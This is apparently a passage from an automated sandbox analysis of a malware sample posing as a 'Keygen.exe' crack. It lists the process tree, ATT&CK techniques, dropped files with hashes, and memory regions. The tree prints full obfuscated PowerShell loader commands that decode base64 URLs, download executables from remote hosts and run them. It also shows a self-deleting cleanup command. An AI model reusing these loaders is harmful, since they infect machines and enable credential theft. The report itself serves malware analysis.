                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:316
                      • C:\Users\Public\mcp.exe
                        "C:\Users\Public\mcp.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2480
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                          6⤵
                          • Loads dropped DLL
                          PID:1508
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:328
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                              8⤵
                              • Loads dropped DLL
                              PID:2896
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                9⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3028
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:2348
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:2944
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:1824
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 1824 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\428265572898199\\* & exit
                                9⤵
                                  PID:1596
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 1824
                                    10⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1940
                          • C:\Users\Public\mcp.exe
                            "C:\Users\Public\mcp.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:728
                          • C:\Users\Public\mcp.exe
                            "C:\Users\Public\mcp.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2564
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5908.tmp\b1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1124
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1092
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      3⤵
                      • Delays execution with timeout.exe
                      PID:1320
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5908.tmp\ba.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1748
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1932
                        • C:\Users\Public\fhj.exe
                          "C:\Users\Public\fhj.exe"
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:2516
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:2620
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:2932
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 2932 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\860968548059991\\* & exit
                                8⤵
                                  PID:2680
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 2932
                                    9⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2588
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:2708
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:2900
                            • C:\Users\Public\fhj.exe
                              "C:\Users\Public\fhj.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:2752
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5908.tmp\ba1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:736
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1968

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Persistence

                  Modify Existing Service

                  1
                  T1031

                  Registry Run Keys / Startup Folder

                  1
                  T1060

                  Defense Evasion

                  Modify Registry

                  5
                  T1112

                  Disabling Security Tools

                  2
                  T1089

                  Install Root Certificate

                  1
                  T1130

                  Credential Access

                  Credentials in Files

                  3
                  T1081

                  Discovery

                  Query Registry

                  2
                  T1012

                  System Information Discovery

                  2
                  T1082

                  Collection

                  Data from Local System

                  3
                  T1005

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\MSVCP140.dll
                  • C:\ProgramData\VCRUNTIME140.dll
                  • C:\ProgramData\freebl3.dll
                  • C:\ProgramData\mozglue.dll
                  • C:\ProgramData\mozglue.dll
                  • C:\ProgramData\msvcp140.dll
                  • C:\ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\softokn3.dll
                  • C:\ProgramData\sqlite3.dll
                  • C:\ProgramData\sqlite3.dll
                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0bd0e15f-5839-44ab-8a5f-eb68a1b23a59
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ab2c564-9698-406f-80da-b82bfb15ab48
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38604b7f-3b56-4cdf-857e-df63e390b481
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a38e600-169e-4ec7-98bd-529788f42566
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_42778251-f07e-4ae1-bc57-a77894ebb1f5
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c3f706e-97a9-41e8-aca3-b206a4c6c3c2
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c80f677-3c28-410d-966a-1d329145fa84
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a700e20d-ef30-47d4-abf6-6f8f1430f64a
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cb0ad894-3107-4e77-8dcf-cebe8f0cfcb9
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cc9b79de-f73d-4062-a98e-b892072016c4
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d6f4f2d9-5e53-4ec9-aa5f-fddd68a1cfd5
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Temp\5908.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\5908.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\5908.tmp\b.hta
                  • C:\Users\Admin\AppData\Local\Temp\5908.tmp\b1.hta
                  • C:\Users\Admin\AppData\Local\Temp\5908.tmp\ba.hta
                  • C:\Users\Admin\AppData\Local\Temp\5908.tmp\ba1.hta
                  • C:\Users\Admin\AppData\Local\Temp\5908.tmp\m.hta
                  • C:\Users\Admin\AppData\Local\Temp\5908.tmp\m1.hta
                  • C:\Users\Admin\AppData\Local\Temp\5908.tmp\start.bat
                  • C:\Users\Admin\AppData\Local\Temp\AoXP2SNZVU.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • C:\Users\Admin\AppData\Local\Temp\AoXP2SNZVU.exe
                  • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                  • C:\Users\Admin\AppData\Local\Temp\apGqLZMKec.exe
                  • C:\Users\Admin\AppData\Local\Temp\apGqLZMKec.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\bmikSAVIZu.exe
                  • C:\Users\Admin\AppData\Local\Temp\bmikSAVIZu.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\vFJcvO6UTg.exe
                  • C:\Users\Admin\AppData\Local\Temp\vFJcvO6UTg.exe
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Public\dyl.exe
                  • C:\Users\Public\dyl.exe
                  • C:\Users\Public\dyl.exe
                  • C:\Users\Public\fhj.exe
                  • C:\Users\Public\fhj.exe
                  • C:\Users\Public\fhj.exe
                  • C:\Users\Public\mcp.exe
                  • C:\Users\Public\mcp.exe
                  • C:\Users\Public\mcp.exe
                  • C:\Users\Public\mcp.exe
                  • C:\Windows\temp\gfw3mjw4.inf
                  • \??\PIPE\srvsvc
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \ProgramData\vcruntime140.dll
                  • \ProgramData\vcruntime140.dll
                  • \ProgramData\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                    MD5

                    02cc7b8ee30056d5912de54f1bdfc219

                    SHA1

                    a6923da95705fb81e368ae48f93d28522ef552fb

                    SHA256

                    1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                    SHA512

                    0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\sqlite3.dll
                  • \Users\Admin\AppData\Local\Temp\5908.tmp\Keygen.exe
                  • \Users\Admin\AppData\Local\Temp\AoXP2SNZVU.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\apGqLZMKec.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\bmikSAVIZu.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\vFJcvO6UTg.exe
                  • \Users\Public\dyl.exe
                  • \Users\Public\dyl.exe
                  • \Users\Public\fhj.exe
                  • \Users\Public\fhj.exe
                  • \Users\Public\mcp.exe
                  • memory/316-19-0x0000000000000000-mapping.dmp
                  • memory/316-27-0x0000000070550000-0x0000000070C3E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/328-258-0x00000000006A0000-0x00000000006F1000-memory.dmp
                    Filesize

                    324KB

                  • memory/328-232-0x0000000000210000-0x0000000000211000-memory.dmp
                    Filesize

                    4KB

                  • memory/328-226-0x0000000000000000-mapping.dmp
                  • memory/328-230-0x00000000000A0000-0x00000000000A1000-memory.dmp
                    Filesize

                    4KB

